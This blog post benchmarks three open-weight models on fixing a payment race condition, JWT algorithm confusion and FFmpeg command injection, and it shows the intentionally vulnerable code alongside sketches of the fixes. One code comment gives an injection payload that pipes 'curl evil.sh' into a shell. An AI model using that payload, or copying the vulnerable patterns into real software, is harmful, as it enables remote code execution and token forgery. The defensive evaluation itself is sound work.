After testing frontier models on security vulnerabilities, a reader asked: "Why not test open-weight models?" So we ran MiniMax M2, Kimi K2 Thinking, and GLM-4.6 against three vulnerabilities (a payment race condition, JWT algorithm confusion, and an FFmpeg command injection) to see how they compare.
A Reader Asked Why Not Test Open-Weight Models
Testing Methodology
We selected three open-weight models from our leaderboard:
MiniMax M2 from MiniMax
Kimi K2 Thinking from Moonshot AI
GLM-4.6 from Z.ai
We ran all tests in Kilo Code on the same base Node.js project (TypeScript + Hono) with all required dependencies pre-installed. For each vulnerability, we created a single file containing only the vulnerable code and prompted the model: "Fix this security vulnerability," without describing the vulnerability type or giving extra context.
Why we did this: Real-world use involves vague prompts. That differs from what many benchmarking providers do, where models are often given detailed prompts describing exactly what to test.
Testing GLM-4.6 in Kilo Code with the standardized Node.js security test project.
How We Evaluated the Model Outputs
We scored each fix across four dimensions:
Correctness: Did it fully close the vulnerability?
Security depth: Did it add defense-in-depth (password hashing, timing-safe comparisons, environment variables)?
Code quality: Is the code clear, maintainable, and appropriately scoped?
Reliability: Did it avoid introducing new bugs or production risks?
Test Design
Test 1: Payment Race Condition
A Node.js payment service with a TOCTOU (time-of-check-time-of-use) double-spend vulnerability. The handler checks the account balance, calls an async payment provider (200ms delay), then deducts the balance.
Two concurrent requests can both pass the balance check before either deducts, which allows users to overspend. This is similar to the Starbucks gift card race exploit from 2015.
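To make the shape of the bug concrete, here is a minimal sketch of the vulnerable handler. The names (an in-memory balance map, a stubbed chargeProvider) are our assumptions for illustration, not the exact test file.

```typescript
// Minimal sketch of the vulnerable shape (assumed names, not the exact test file).
import { Hono } from 'hono';

const app = new Hono();
const balances = new Map<string, number>([['alice', 100]]);

// Stand-in for the external payment provider (~200ms round trip).
const chargeProvider = (_amount: number) =>
  new Promise<void>((resolve) => setTimeout(resolve, 200));

app.post('/pay', async (c) => {
  const { userId, amount } = await c.req.json();

  const balance = balances.get(userId) ?? 0;      // 1. check
  if (balance < amount) {
    return c.json({ error: 'insufficient funds' }, 400);
  }

  await chargeProvider(amount);                   // 2. slow async call

  balances.set(userId, balance - amount);         // 3. use (deducts from the stale read)
  return c.json({ ok: true, remaining: balance - amount });
});

export default app;
```

Two requests that arrive within the provider delay both read the same balance at step 1, so both deductions go through.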
Test 2: JWT Algorithm Confusion
An authentication service that accepts both RS256 (asymmetric) and HS256 (symmetric) tokens while using the same public key value for verification.
RS256 uses a private key to sign and a public key to verify. HS256 uses a shared secret for both. Because the public key is not secret, attackers can reuse it as an HS256 secret to forge admin tokens, similar to CVE-2015-9235.
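As a rough illustration (assuming the widely used jsonwebtoken package rather than the exact test code), the vulnerable verification looks something like this:

```typescript
// Illustrative sketch assuming the `jsonwebtoken` package (not the exact test code).
import jwt from 'jsonwebtoken';

// The service's RSA public key: used to verify RS256 signatures, but not secret.
const PUBLIC_KEY = process.env.JWT_PUBLIC_KEY ?? '';

// Vulnerable: HS256 is still in the allowed list, so the same PUBLIC_KEY string
// is also accepted as an HMAC secret. Anyone who has the public key can sign an
// HS256 token with it and be treated as a valid (even admin) user.
export function verifyTokenVulnerable(token: string) {
  return jwt.verify(token, PUBLIC_KEY, { algorithms: ['RS256', 'HS256'] });
}
```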
Test 3: Command Injection in FFmpeg
A thumbnail generation API that interpolates user input directly into a shell command executed with exec().
The exec() call passes a string to the shell, which interprets metacharacters like ; | & $(). Attackers can inject commands through the filter parameter, similar to ImageTragick (CVE-2016-3714) where ImageMagick processed filenames as shell commands.
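Here is a minimal sketch of the vulnerable pattern, with assumed file and function names:

```typescript
// Illustrative sketch of the vulnerable pattern (assumed names, not the exact test file).
import { exec } from 'node:child_process';

function generateThumbnail(inputFile: string, filter: string) {
  // User-controlled values are interpolated straight into a shell command string.
  const cmd = `ffmpeg -i uploads/${inputFile} -vf "${filter}" -frames:v 1 thumbs/out.png`;

  // exec() hands the whole string to /bin/sh, which interprets ; | & $() and friends.
  exec(cmd, (err, _stdout, stderr) => {
    if (err) console.error('ffmpeg failed:', stderr);
  });
}

// A filter value such as  scale=320:-1"; curl evil.sh | sh #  breaks out of the
// quotes and runs attacker-controlled commands on the server.
generateThumbnail('video.mp4', 'scale=320:-1');
```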
Test Results
Test 1: Payment Race Condition
All three models correctly identified the race condition and implemented locking mechanisms.
MiniMax M2 ($0.02): Fixed the race condition with a queue-based mutex and added several production features beyond the core fix.
MiniMax M2 added rate limiting (10 requests per minute), transaction logging with an audit trail, regex-based input validation, admin endpoints for monitoring (/transactions, /health), and a 5% error simulation to mimic external payment provider failures.
MiniMax M2 in Kilo Code after fixing the payment race condition.
Kimi K2 Thinking ($0.08): Used a per-user lock around the critical section and limited changes to the race condition fix.
GLM-4.6 ($0.16): Implemented a per-user promise-based lock around balance updates and added userId and amount validation.
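Kimi K2 Thinking and GLM-4.6 both went with per-user locks. The sketch below is our minimal reconstruction of a promise-chaining per-user lock, not either model's literal output:

```typescript
// Minimal per-user promise-chaining lock (our sketch, not a model's exact output).
const userLocks = new Map<string, Promise<unknown>>();

function withUserLock<T>(userId: string, fn: () => Promise<T>): Promise<T> {
  const previous = userLocks.get(userId) ?? Promise.resolve();
  // Chain the new operation after whatever is already running for this user.
  const run = previous.catch(() => undefined).then(fn);
  // Store a settled-safe tail so one failure doesn't wedge the queue.
  const tail = run.catch(() => undefined);
  userLocks.set(userId, tail);
  // Clean up the map entry once this operation is the last one in the chain.
  tail.finally(() => {
    if (userLocks.get(userId) === tail) userLocks.delete(userId);
  });
  return run;
}

// Usage inside the payment handler: check, charge, and deduct are now serialized per user.
// await withUserLock(userId, async () => {
//   const balance = getBalance(userId);
//   if (balance < amount) throw new Error('insufficient funds');
//   await chargeProvider(amount);
//   setBalance(userId, balance - amount);
// });
```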
Test 2: JWT Algorithm Confusion
All models fixed the core vulnerability by restricting algorithms to RS256 only.
MiniMax M2 ($0.01): Restricted verification to RS256 but left the rest of the auth flow mostly unchanged:
Correctly restricted verification to RS256
Left the HS_SECRET variable unused in the code
Kept plaintext password storage
Did not change error handling or environment variable usage
Kimi K2 Thinking ($0.04): Restricted verification to RS256 and added additional auth hardening (see the sketch below):
Fixed the algorithm confusion with an explicit comment
Added bcrypt password hashing
Implemented timing-safe user enumeration protection
Loaded keys from environment variables with newline handling
Changed auth errors to generic messages to reduce information leakage
Kimi K2 Thinking in Kilo Code after fixing the JWT algorithm confusion.
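The sketch below approximates that combination of mitigations. It assumes the jsonwebtoken and bcrypt packages and is our reconstruction, not Kimi K2 Thinking's literal output:

```typescript
// Approximation of the hardened flow (our sketch, not the model's literal output).
import jwt from 'jsonwebtoken';
import bcrypt from 'bcrypt';

// Key loaded from the environment, with escaped newlines restored.
const PUBLIC_KEY = (process.env.JWT_PUBLIC_KEY ?? '').replace(/\\n/g, '\n');

export function verifyToken(token: string) {
  // Algorithm pinned to RS256 only: the public key can no longer double as an HMAC secret.
  return jwt.verify(token, PUBLIC_KEY, { algorithms: ['RS256'] });
}

type UserRecord = { passwordHash: string };

export async function login(
  username: string,
  password: string,
  findUser: (u: string) => Promise<UserRecord | null>
) {
  const user = await findUser(username);
  // Compare against a dummy hash when the user is missing, so response timing
  // doesn't reveal whether the username exists.
  const hash = user?.passwordHash ?? (await bcrypt.hash('dummy-password', 10));
  const ok = await bcrypt.compare(password, hash);
  if (!user || !ok) {
    // Generic message: no hint about which part of the credentials failed.
    throw new Error('Invalid credentials');
  }
  return user;
}
```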
GLM-4.6 ($0.07): Restricted verification to RS256 and removed HS256 from the allowed algorithms.
Correctly restricted algorithms to RS256 only
Removed HS256 from the allowed algorithms list
Fixed the vulnerability with minimal code changes
Maintained the existing auth flow structure
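Concretely, the minimal change comes down to pinning the verifier's algorithm list; a sketch assuming the jsonwebtoken package:

```typescript
// The minimal fix, sketched with the `jsonwebtoken` package: pin the algorithm list.
import jwt from 'jsonwebtoken';

const PUBLIC_KEY = process.env.JWT_PUBLIC_KEY ?? '';

// HS256 removed from the allowed algorithms; the rest of the auth flow stays as-is.
export const verifyToken = (token: string) =>
  jwt.verify(token, PUBLIC_KEY, { algorithms: ['RS256'] });
```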
Test 3: Command Injection in FFmpeg
All models switched from exec() to safe alternatives, but implementation quality varied.
MiniMax M2 ($0.02): Used spawn() with validation but didn't wait for process completion
Used spawn() with an argument array
Validated filters with multiple regex patterns
Normalized and validated input paths
Correctly prevented command injection but returned success before FFmpeg completed
Kimi K2 Thinking ($0.04): Used regex-based validation with execFile()
Used execFile() to avoid shell parsing
Allowed multiple base directories for input files
Sanitized output filenames
Returned structured error responses including FFmpeg stderr
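A simplified sketch of the execFile() approach (single base directory, assumed names; not Kimi's literal output):

```typescript
// Sketch of the execFile() approach (our approximation, simplified to one base directory).
import { execFile } from 'node:child_process';
import { promisify } from 'node:util';
import path from 'node:path';

const execFileAsync = promisify(execFile);

// Only simple, known-safe filter strings pass; everything else is rejected.
const FILTER_PATTERN = /^[a-zA-Z0-9_=:,.\-]+$/;

export async function generateThumbnail(inputFile: string, filter: string) {
  if (!FILTER_PATTERN.test(filter)) throw new Error('invalid filter');

  const inputPath = path.resolve('/app/uploads', path.basename(inputFile));
  const outputPath = path.resolve('/app/thumbs', `${Date.now()}.png`);

  // execFile() passes arguments directly to ffmpeg; no shell ever parses them.
  const { stderr } = await execFileAsync('ffmpeg', [
    '-i', inputPath,
    '-vf', filter,
    '-frames:v', '1',
    outputPath,
  ]);
  return { outputPath, stderr };
}
```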
GLM-4.6 ($0.05): Used a strict filter allowlist and directory sandboxing
Used spawn() with argument arrays (no shell interpolation)
Implemented a strict filter allowlist with predefined safe options only
Restricted input files to a single sandboxed directory (/app/uploads)
Validated all file paths before processing
Wrapped the FFmpeg call in a Promise and properly awaited process completion before returning
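A sketch of that shape, with assumed filter names and paths (not GLM-4.6's literal output):

```typescript
// Sketch of the spawn()-based approach (our approximation, not the model's literal output).
import { spawn } from 'node:child_process';
import path from 'node:path';

// Strict allowlist: only predefined filter chains are ever passed to ffmpeg.
const ALLOWED_FILTERS: Record<string, string> = {
  small: 'scale=160:-1',
  medium: 'scale=320:-1',
  large: 'scale=640:-1',
};

const UPLOAD_DIR = '/app/uploads';

export function generateThumbnail(inputFile: string, filterName: string): Promise<string> {
  const filter = ALLOWED_FILTERS[filterName];
  if (!filter) return Promise.reject(new Error('unknown filter'));

  // Resolve the path and make sure it cannot escape the sandboxed upload directory.
  const inputPath = path.resolve(UPLOAD_DIR, inputFile);
  if (!inputPath.startsWith(UPLOAD_DIR + path.sep)) {
    return Promise.reject(new Error('invalid input path'));
  }

  const outputPath = path.join('/app/thumbs', `${Date.now()}.png`);

  // spawn() with an argument array: no shell, no metacharacter interpretation.
  return new Promise((resolve, reject) => {
    const ffmpeg = spawn('ffmpeg', ['-i', inputPath, '-vf', filter, '-frames:v', '1', outputPath]);
    let stderr = '';
    ffmpeg.stderr.on('data', (chunk) => (stderr += chunk));
    // Resolve only after the process exits, so callers never see success early.
    ffmpeg.on('close', (code) =>
      code === 0 ? resolve(outputPath) : reject(new Error(`ffmpeg exited with ${code}: ${stderr}`))
    );
    ffmpeg.on('error', reject);
  });
}
```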
Cost Analysis: 5.6x Price Difference
MiniMax M2 averaged about $0.017 per vulnerability, versus $0.053 for Kimi K2 Thinking and $0.093 for GLM-4.6: 82% less than GLM-4.6 and 69% less than Kimi K2 Thinking. Its scores ranged from 82 to 95, with its highest score (95) on the race condition test.
Overall Quality Scores
Based on our four evaluation dimensions, here's how each model scored:
MiniMax M2's scores ranged from 82 to 95, Kimi K2 Thinking stayed between 93 and 96, and GLM-4.6 landed between 90 and 94.
Performance Patterns Across Tests
MiniMax M2
Profile: Lowest cost with varied approaches
Achieved the highest score (95) on the race condition test
Lowest cost at $0.017 per vulnerability
Detected all three vulnerabilities successfully
Provided minimal fixes focused on the core security issue
Kimi K2 Thinking
Profile: Consistent fixes with security improvements beyond the core vulnerability
All three fixes were deployment-ready in our tests
Added security hardening beyond the core fix in every test
Maintained scores in the 93-96 range
Average cost of $0.053 per vulnerability
GLM-4.6
Profile: Correct fixes with conservative security choices
Fixed every vulnerability without introducing new ones in our tests
Preferred restrictive controls such as strict allowlists and directory sandboxing
Had the highest average cost at $0.093 per vulnerability
Scores stayed in the 90-94 range
How Models Performed by Vulnerability Type
The models showed different strengths depending on the vulnerability.
Race Condition (Test 1)
All three models added locking around balance updates and closed the double-spend vulnerability.
MiniMax M2 combined a queue-based mutex with rate limiting, transaction logging, and monitoring endpoints, and scored 95 on this test.
GLM-4.6 and Kimi K2 Thinking focused on per-user locks without additional observability or rate limiting and scored 90 and 93 respectively.
JWT Algorithm Confusion (Test 2)
All three models restricted verification to RS256 and removed HS256 from the allowed algorithms.
Kimi K2 Thinking was the only model that added bcrypt password hashing, timing-safe user checks, environment variable handling, and generic error messages; it scored 96 on this test.
GLM-4.6 limited its changes to the algorithm list and left the rest of the auth flow unchanged (90), while MiniMax M2 restricted algorithms but kept plaintext passwords and unused variables (85).
Command Injection (Test 3)
All three models replaced exec() with safer process execution methods (spawn or execFile) and validated inputs before calling FFmpeg.
GLM-4.6 and Kimi K2 Thinking both produced production-ready implementations in our tests, each scoring 94, with GLM favoring a strict filter allowlist and directory sandboxing and Kimi using regex-based validation and multiple allowed directories.
MiniMax M2 used spawn() with filter and path validation but didn't await process completion, scoring 82. While this would need adjustment for production use, it correctly prevented the command injection.
Across the three tests, MiniMax M2 produced the most extensive changes on the race condition, Kimi K2 Thinking added the deepest auth hardening, and GLM-4.6 favored restrictive defaults for command execution.
Which Models Should You Use?
For high-volume security scanning: At $0.017 per vulnerability, MiniMax M2 makes continuous, large-scale scanning affordable. When you need to check hundreds of files, the 82% cost reduction means you can actually afford broad coverage. It caught all three vulnerabilities in our tests.
For balanced everyday use: Kimi K2 Thinking provides consistent quality (93-96 scores) at mid-range cost ($0.053 per vulnerability). It produced deployment-ready fixes in all three scenarios with additional security hardening built in.
For a complementary opinion: Add GLM-4.6 to either model above when you need a second opinion. Its strict allowlists and sandboxing bring a different angle on the same problems. Running MiniMax M2 + GLM-4.6 together cost $0.11 per vulnerability in our tests, while Kimi K2 + GLM-4.6 cost $0.146 per vulnerability.
What This Means for Open-Weight LLMs
Across these three vulnerabilities, all three open-weight models identified and fixed every core issue (3 of 3 tests each). In practical terms, they found problems that typical human code review might miss, including the race condition and the JWT algorithm confusion.
The biggest differences we observed relative to frontier models were consistency and depth of hardening. While frontier models like GPT-5 and Claude Opus 4.1 typically add more comprehensive hardening, the open-weight models all successfully identified the core vulnerabilities.
From a cost perspective, running all three open-weight models against all three vulnerabilities ($0.05 + $0.16 + $0.28 = $0.49 total) is still below the price of many individual frontier model calls. For teams willing to review and combine outputs, open-weight LLMs can cover real security work at relatively low cost.